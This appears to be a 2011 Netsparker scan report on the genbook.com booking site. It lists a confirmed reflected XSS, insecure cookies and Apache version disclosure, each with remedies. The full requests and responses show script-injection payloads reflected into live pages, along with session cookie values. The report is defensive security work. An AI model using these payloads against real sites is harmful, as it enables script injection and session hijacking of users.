<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with Cloud Nine in oakland, California

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<h1 id="businessname">Cloud Nine</h1>
<div id="businessaddress">5495 A claremont ave., oakland, CA 94618</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30012013?'"--></style></script><script>netsparker(0x00078C)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30012013/reviews?'"--></style></script><script>netsparker(0x00078C)</script>">Reviews (141)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Waxing</div></div></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1644550">Threading</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1644835">Tinting</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1644900">Facials</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1645030">Body Treatments</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1885600">Combination</a></li>
</ul>
</dd>
</dl>
<div id="services">

<a name="1644369" class="servicecategory">Waxing</a>
<dl>


<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644376?bookingContactId=194997996">Brow - $20.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644332?bookingContactId=194997996">Lip - $10.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644383?bookingContactId=194997996">Chin or Cheek - $12.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644399?bookingContactId=194997996">Full Face - $55.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644419?bookingContactId=194997996">Brazilian Bikini - $55.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644403?bookingContactId=194997996">Bikini Wax - $25.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644389?bookingContactId=194997996">Extended Bikini Wax - $35.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644461?bookingContactId=194997996">Underarm - $17.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644671?bookingContactId=194997996">Half Arm - $20.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644650?bookingContactId=194997996">Full Arm - $35.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644646?bookingContactId=194997996">Back or Chest - $30.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644435?bookingContactId=194997996">Half Leg - $35.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644428?bookingContactId=194997996">Full Leg - $60.00</a>
</dt>
<dd></dd>

























</dl>








</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=5495 A claremont ave.,oakland,CA 94618&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">Cloud Nine</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">5495 A claremont ave.</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">oakland</span>, <span class="region" itemprop="region">CA</span> <span class="postal-code" itemprop="postal-code">94618</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://cloudninesalon.biz" target="_blank">http://cloudninesalon.biz</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Mon</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Fri</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>9:00am - 6:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sun</div>
<div>9:00am - 2:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >
</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">Cloud Nine</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">5495 A claremont ave.</span>,&nbsp;
<span class="locality" itemprop="locality">oakland</span>,&nbsp;
<span class="region" itemprop="region">CA</span>&nbsp;
<span class="postal-code" itemprop="postal-code">94618</span>,
</span>
<a class="url" itemprop="url" href="http://cloudninesalon.biz" target="_blank">http://cloudninesalon.biz</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="dtreviewed" title="2011-04-24" itemprop="dtreviewed" datetime="2011-04-24">Apr 24, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">Alresa is fast, friendly and fabulous! I have been a client for a while, and have put my unruly brows in her skilled hands before my wedding and most recently before my upcoming baby shower. She has NEVER disappointed. It's like going to see a friend but you leave looking fantastic. You'll love her like I do!</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30012013/reviews?'"--></style></script><script>netsparker(0x00078C)</script>">Read all 141 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30012013");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30012013");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;

window.setTimeout('setAddressDiv("5495 A claremont ave., oakland, CA 94618", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>
- /bookings/slot/reservation/30010843

/bookings/slot/reservation/30010843 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30010843?'"--></style></script><script>alert(0x0007..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000786)</script>

Request

GET /bookings/slot/reservation/30010843?'"--></style></script><script>netsparker(0x000786)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997989; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: CUSTOMER_COOKIE=194997995
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with Mochi Massage in San Francisco, California</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =false;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with Mochi Massage in San Francisco, California

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<img src="serviceprovider/30010843/logo" alt="Logo" width="128" height="78"/>
<h1 id="businessname">Mochi Massage</h1>
<div id="businessaddress">582 Market St., Suite 908, San Francisco, CA 94104</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30010843?'"--></style></script><script>netsparker(0x000786)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30010843/reviews?'"--></style></script><script>netsparker(0x000786)</script>">Reviews (50)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Full Sessions</div></div></li>
<li><a href="slot/reservation/30010843?bookingContactId=194997995&category=53792482">20-Minute Wellness</a></li>
</ul>
</dd>
</dl>
<div id="services">

<a name="793682" class="servicecategory">Full Sessions</a>
<dl>











<dt>
<a href="slot/reservation/30010843/822685?bookingContactId=194997995">Mochi Melt (40 min) - $60.00</a>
</dt>
<dd>Utilizing effective shiatsu moves, we will work with you on breathing, awareness and letting go of tension. You'll feel invigorated and ready to take on the rest of the day!</dd>



<dt>
<a href="slot/reservation/30010843/822690?bookingContactId=194997995">Mo' Chi is Mo' Bettah (60 min) - $85.00</a>
</dt>
<dd>This full-hour bodywork session begins with Swedish bodywork to increase blood circulation in your muscles, and shiatsu techniques to enhance internal health. The session ends with blissful and centering work on your head and neck. </dd>



<dt>
<a href="slot/reservation/30010843/822733?bookingContactId=194997995">Mochi Medicine (90 min) - $125.00</a>
</dt>
<dd>Using a plethora of swedish, shiatsu and deep tissue techniques, this 90-minute session will get your chi flowing, address specific areas of tension and leave you feeling relaxed, rejuvenated and ready to face the world.</dd>



<dt>
<a href="slot/reservation/30010843/822710?bookingContactId=194997995">Traditional Zen Shiatsu - $125.00</a>
</dt>
<dd>90 minutes of bodywork done on a shiatsu mat. Performed over a sheet using no oil or creams, Zen Shiatsu works to rebalance your energy, leaving you relaxed but invigorated. </dd>
















<dt>
<a href="slot/reservation/30010843/57407766?bookingContactId=194997995">1/2 and 1/2 (90 minutes) - $125.00</a>
</dt>
<dd>Get your breathing on with this fabulous combination of bodywork and yoga. 45 minutes of one-on-one restorative yoga followed by 45 minutes of deeply therapeutic massage. It's the best of both worlds.</dd>



<dt>
<a href="slot/reservation/30010843/57414128?bookingContactId=194997995">Mo'chi for Mamas (60 minutes) - $100.00</a>
</dt>
<dd>A session designed especially for busy mamas-to-be. Our convenient location and nurturing touch makes for the ideal way to take care of yourself and your baby. Say goodbye to stress, aches, and swelling. </dd>





</dl>





</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=37.7895393371582,-122.401611328125(Mochi Massage)&ll=37.7895393371582,-122.401611328125&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">Mochi Massage</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">582 Market St., Suite 908</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">San Francisco</span>, <span class="region" itemprop="region">CA</span> <span class="postal-code" itemprop="postal-code">94104</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://www.mochimassage.com" target="_blank">http://www.mochimassage.com</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Mon</div>
<div>4:00pm - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>10:00am - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>10:00am - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>10:00am - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Fri</div>
<div>9:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>12:00pm - 4:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >

</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">Mochi Massage</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">582 Market St., Suite 908</span>,&nbsp;
<span class="locality" itemprop="locality">San Francisco</span>,&nbsp;
<span class="region" itemprop="region">CA</span>&nbsp;
<span class="postal-code" itemprop="postal-code">94104</span>,
</span>
<a class="url" itemprop="url" href="http://www.mochimassage.com" target="_blank">http://www.mochimassage.com</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="dtreviewed" title="2011-04-20" itemprop="dtreviewed" datetime="2011-04-20">Apr 20, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">I went there yesterday at lunch this week. It was awesome ! I want to go back as soon as I can. I have got a back massage and it works perfectly. YOu should that this out !</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30010843/reviews?'"--></style></script><script>netsparker(0x000786)</script>">Read all 50 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30010843");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30010843");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;
latLong=new GLatLng(37.7895393371582,-122.401611328125);

window.setTimeout('setAddressDiv("582 Market St., Suite 908, San Francisco, CA 94104", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>


<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>

<script>
COMSCORE.beacon({
c1:2,
c2:7517143,
c3:"",
c4:"",
c5:"",
c6:"",
c15:""
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7517143&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->
</body>
</html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure
1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /manager/

/manager/ CONFIRMED

https://www.genbook.com/manager/

Identified Cookie

seraph.os.cookie

Request

GET /manager/ HTTP/1.1
Referer: https://www.genbook.com/manager/forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Found
Date: Tue, 26 Apr 2011 00:59:41 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.genbook.com/manager/browsernotsupported.action
Content-Length: 0
Set-Cookie: seraph.os.cookie=;Path=/manager;Expires=Thu, 01 Jan 1970 00:00:00 GMT
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/plain; charset=UTF-8


[Possible] Cross-site Scripting

[Possible] Cross-site Scripting
1 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /bookings/booknowjstag.action

/bookings/booknowjstag.action

http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId='%22--%3E%3C/style%3..

Parameters

Parameter Type Value
id GET 30134654
bookingSourceId GET '"--></style></script><script>alert(0x00007F)</script>

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007F)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:00:01 GMT
Server: Jetty(6.1.21)
Content-Type: text/javascript; charset=UTF-8
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 01:00:01 GMT
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck, 100 );
}
}
var NL = '\n'
var sWrite = "";
document.writeln('<a href="http://www.genbook.com/bookings/slot/reservation/30134654?bookingSourceId='"--></style></script><script>netsparker(0x00007F)</script>" target="_blank"><img src="http://www.genbook.com/bookings/images/booknow.gif" width="100" height="34" alt="Make an Online Appointment" border="0"/></a>' + sWrite)
document.writeln('<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><br/>');
sWrite = '<script type="text/javascript">' + NL
sWrite += '_uacct="UA-1818709-3";' + NL
sWrite += '_udn="none";' + NL
sWrite += '_ulink=1;' + NL
sWrite += 'urchinCheck()' + NL
sWrite += '</script>' + NL
document.writeln(sWrite);
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /bookings/booknowjstag.action

/bookings/booknowjstag.action CONFIRMED

http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1..

Identified Cookie

JSESSIONID

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1)//7010dea1bfa HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:58:47 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: JSESSIONID=yiybmdbkuia2.cb2;Path=/bookings
X-UA-Compatible: IE=7
Keep-Alive: timeout=10, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked



var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck, 100 );
}
}
var NL = '\n'
var sWrite = "";
document.writeln('<a href="http://www.genbook.com/bookings/slot/reservation/30134654?bookingSourceId=10009769d';alert(1)//7010dea1bfa" target="_blank"><img src="http://www.genbook.com/bookings/images/booknow.gif" width="100" height="34" alt="Make an Online Appointment" border="0"/></a>' + sWrite)
document.writeln('<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><br/>');
sWrite = '<script type="text/javascript">' + NL
sWrite += '_uacct="UA-1818709-3";' + NL
sWrite += '_udn="none";' + NL
sWrite += '_ulink=1;' + NL
sWrite += 'urchinCheck()' + NL
sWrite += '</script>' + NL
document.writeln(sWrite);
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /bookings/images/

/bookings/images/

http://www.genbook.com/bookings/images/

Extracted Version

2.2.3 (Red Hat)

Request

GET /bookings/images/ HTTP/1.1
Referer: http://www.genbook.com/bookings/images/booknow.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=yiybmdbkuia2.cb2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 26 Apr 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1


